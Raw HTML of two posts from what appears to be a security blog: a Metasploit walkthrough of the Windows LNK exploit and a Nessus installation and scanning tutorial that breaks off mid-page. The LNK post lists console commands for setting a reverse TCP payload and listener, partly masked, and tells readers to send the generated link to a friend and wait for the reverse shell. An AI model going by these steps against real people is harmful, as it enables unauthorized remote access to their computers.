<a href="http://www.pentester.co.in/2011/10/windows-lnk-exploit.html" style="color: #373736; display: block; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;">Windows lnk Exploit</a></h3>
<div class="post-header-line-1">
</div>
<div class="postmeta-primary" style="color: #878282; font-size: 11px; padding-bottom: 5px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-transform: uppercase;">
<br /></div>
<div class="post-body entry-content" style="font-family: Arial, Verdana; font-size: 12px; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 10px; padding-top: 0px;">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif;">Hack the system using the windows lnk exploit:</span></u></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Update metasploit.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Goto the prompt and goto framework<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Then type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">#./msfconsole<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Msf>prompt opens..<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">The search for the exploit windows lnk.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Msf>search lnk<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Then it shows the exploit<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">exploit/xxxxx/xxxxxr/xxxxx_dllloader<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">then type:</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><o:p></o:p></span></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">msf>use exploitname</span></b></span><span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">(type above exploit)<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">set <b>SRVHOST </b><span> </span>tat is your local ip to get conection back</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Then set payload<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Shell/reverse_tcp payload works mostly<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">so type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">msf>set payload windows/metxxxxx/xxx_tcp<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">then set LHOST as your local ip<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">then type:<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">msf>exploit<o:p></o:p></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"><br /></span></b></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">you will be shown a url or address with port number..give it to ur friend<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">tada !<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">wait for the reverse connection.<o:p></o:p></span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">---------------------------------------------------</span></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span class="apple-style-span"><b><u><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;">Warning:</span></u></b></span><span class="apple-style-span"><b><span style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: black; font-family: Arial, sans-serif; font-size: 10pt; line-height: 14px;"> Im not responsible for ur actions , just for educational purpose only</span></b></span></div>
</div>
</div>
</div>
</div>sudhirhttp://www.blogger.com/profile/07016075449331701681noreply@blogger.com0tag:blogger.com,1999:blog-7651709861170417818.post-64096234478724629562011-10-15T04:07:00.000-07:002011-10-15T04:07:56.068-07:00Nessus<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal">
<span class="apple-style-span"><b><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Nessus</span></b></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">is a</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">proprietary</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">comprehensive
vulnerability scanning program. It is free of charge for personal use in a
non-enterprise environment. Its goal is to detect potential</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">vulnerabilities</span></span><span class="apple-converted-space"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;"> </span></span><span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">on the tested
systems.</span><o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 4.8pt;">
<span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">For example:<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 1.2pt; margin-left: .25in; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: Wingdings; font-size: 10.0pt; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span>§<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">Vulnerabilities
that allow a remote</span><span style="color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";"> </span><span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";">cracker </span><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">to control or access sensitive data on a
system.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 1.2pt; margin-left: .25in; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: Wingdings; font-size: 10.0pt; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span>§<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">Misconfiguration
(e.g.</span><span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";"> open mail
relay</span><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">, missing patches,
etc).<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 1.2pt; margin-left: .25in; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: Wingdings; font-size: 10.0pt; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span>§<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";">Default
passwords</span><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">, a few common</span><span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";"> passwords</span><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">, and blank/absent passwords on some system
accounts. Nessus can also call</span><span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";"> Hydra </span><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">(an external tool) to launch a</span><span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";"> dictionary attack</span><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: 18.0pt; margin-bottom: 1.2pt; margin-left: .25in; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<!--[if !supportLists]--><span style="color: black; font-family: Wingdings; font-size: 10.0pt; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;"><span>§<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";">Denials
of service </span><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">against the</span><span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";"> TCP/IP stack </span><span style="background: white; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";">by using</span><span style="font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: "Times New Roman";"> mangled packets</span><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; mso-fareast-font-family: "Times New Roman";"><o:p></o:p></span></div>
<div class="MsoNormal">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">------------------------------------------------------------------------------------------------------<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">Most
organisations does network vulnerability assessment by using this tool.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span class="apple-style-span"><span style="background: white; color: black; font-family: "Arial","sans-serif"; font-size: 10.0pt; line-height: 115%;">You
can download NESSUS from here:<o:p></o:p></span></span></div>
<div class="MsoNormal">
<a href="http://www.tenable.com/products/nessus/nessus-download-agreement">http://www.tenable.com/products/nessus/nessus-download-agreement</a></div>
<div class="MsoNormal">
Download and install Nessus .Its free of charge for personal
use and chargable for Business use for corporate offices.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
After Installing you get “Nessus Server manager .exe” <span> </span>file and <span> </span>“Nessus client.exe” on Desktop.Open<span> </span>“Nessus Server manager .exe” <span> </span><span> </span>you
find like this:</div>
<div class="MsoNormal">
<span class="Apple-style-span" style="font-family: Arial, sans-serif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 14px;"><br /></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYTssbBfgB_i2cw73ZcGNBWdESVNKCG-3QBClSPQGlanFwn3AqJyrCwhduZSGVZPDkobosRlGPBCytCUtNHwcoqck1095LAtlHcVTuTw2rzz8XoCAhRTaxS_hkPE1Ir78Krzi8QttVQvo/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYTssbBfgB_i2cw73ZcGNBWdESVNKCG-3QBClSPQGlanFwn3AqJyrCwhduZSGVZPDkobosRlGPBCytCUtNHwcoqck1095LAtlHcVTuTw2rzz8XoCAhRTaxS_hkPE1Ir78Krzi8QttVQvo/s320/Untitled.png" width="270" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Now click on the “Manage user’s” <span> </span>button.</div>
<div class="MsoNormal">
Click on the “ + “ button to add user make the user as
admin.like below:</div>
<div class="MsoNormal">
<span><br /><!--[endif]--></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2xlKieJjSccGuLMNnp48qX8Da4ET8QYQbXdidmLEy28AQf50ZBXefLeyORG9FLMqxwk0QZIL0ttoyIfrh0DNJmGCJZbs9Nckb1e1HxKeGSPv9Ext3dCYvaD4e0hxTJSSx-YwUwx5jthI/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2xlKieJjSccGuLMNnp48qX8Da4ET8QYQbXdidmLEy28AQf50ZBXefLeyORG9FLMqxwk0QZIL0ttoyIfrh0DNJmGCJZbs9Nckb1e1HxKeGSPv9Ext3dCYvaD4e0hxTJSSx-YwUwx5jthI/s320/1.png" width="291" /></a></div>
<div class="MsoNormal">
<span><br /></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The click on the “Start Nessus server” <span> </span>button.</div>
<div class="MsoNormal">
Now<span> </span>start the “Nessus
client”. Browser will be opened to you with address “https://localhost:8834/”.</div>
<div class="MsoNormal">
Now Login with credentials you have created in Manage users.like
below:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnte2htxdshHFL1a_2szuJhDMTqvV8HiS117zPMaXoYiScrvEKvN0Mk4DuHRl4XVk1Kr0hPRFljDbVVt1Z5ogriB5c0R35l3AUzMBOR4DQykpX9SYmGDYPxn2xmmuBP_LWvRL9XpmjImQ/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnte2htxdshHFL1a_2szuJhDMTqvV8HiS117zPMaXoYiScrvEKvN0Mk4DuHRl4XVk1Kr0hPRFljDbVVt1Z5ogriB5c0R35l3AUzMBOR4DQykpX9SYmGDYPxn2xmmuBP_LWvRL9XpmjImQ/s640/2.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
For default scan:</div>
<div class="MsoNormal">
Click on “scans” button and click “add”</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmALnlNZYHpm5OriCgvJJAq8ocoyvDqZ7CxtonHNWQXoGXiRAcaKd0RZ7ZnfXynHS-DmWcQrN_xApLS4T9Saa33o1H7GTZH0ASier2_pdmvjUJ15g3_UdvYC90nTTxYuIsRRdO_4sJ00Q/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmALnlNZYHpm5OriCgvJJAq8ocoyvDqZ7CxtonHNWQXoGXiRAcaKd0RZ7ZnfXynHS-DmWcQrN_xApLS4T9Saa33o1H7GTZH0ASier2_pdmvjUJ15g3_UdvYC90nTTxYuIsRRdO_4sJ00Q/s640/3.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span><!--[if gte vml 1]><v:shape
id="Picture_x0020_13" o:spid="_x0000_i1030" type="#_x0000_t75" style='width:535.5pt;
height:104.25pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\sudhir\AppData\Local\Temp\msohtmlclip1\01\clip_image007.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Now you get this : <span><!--[if gte vml 1]><v:shape
id="Picture_x0020_16" o:spid="_x0000_i1029" type="#_x0000_t75" style='width:508.5pt;
height:3in;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="file:///C:\Users\sudhir\AppData\Local\Temp\msohtmlclip1\01\clip_image009.png"
o:title=""/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmabrNpHk49uyqOuH2B6xURw_rl6jy07gZETBYyp0gx00Xnq3zBBtAPu4A3A1pA6kq2VJ6TWh2XwXz_TuopvUbC_7l4cAjGR_v18hiGCsRUCZnawr0bphPlD6KkA1dhH0fqkMTX_Ooh68/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmabrNpHk49uyqOuH2B6xURw_rl6jy07gZETBYyp0gx00Xnq3zBBtAPu4A3A1pA6kq2VJ6TWh2XwXz_TuopvUbC_7l4cAjGR_v18hiGCsRUCZnawr0bphPlD6KkA1dhH0fqkMTX_Ooh68/s640/4.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Type name of the test and select <span> </span>policy and enter the targets.It there are
larger number of IP’s then upload from the text file.i.e(Target file).Here the
policies are : “Internal network scan” and “external netwrok scan” , “Web app
test” .</div>
<div class="MsoNormal">
If you are scanning external network select that and if you
are testing Web application select that task.</div>
<div class="MsoNormal">
Im selecting Internal network for just testing.</div>
<div class="MsoNormal">
Then launch scan: </div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfDO1kPcXk1AxJnSY3b3LXyJu1fta6qedcN0XjN3E9qOXpgT8H4x2AZGKswzf-o_dvh0soIZVGR7KTyVB8ttF0-JU7eYMyvl6iaAS8jcBRtMZPDXzOuL-sYNUW4NemFpDA5bAHMsD-oqY/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfDO1kPcXk1AxJnSY3b3LXyJu1fta6qedcN0XjN3E9qOXpgT8H4x2AZGKswzf-o_dvh0soIZVGR7KTyVB8ttF0-JU7eYMyvl6iaAS8jcBRtMZPDXzOuL-sYNUW4NemFpDA5bAHMsD-oqY/s640/5.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
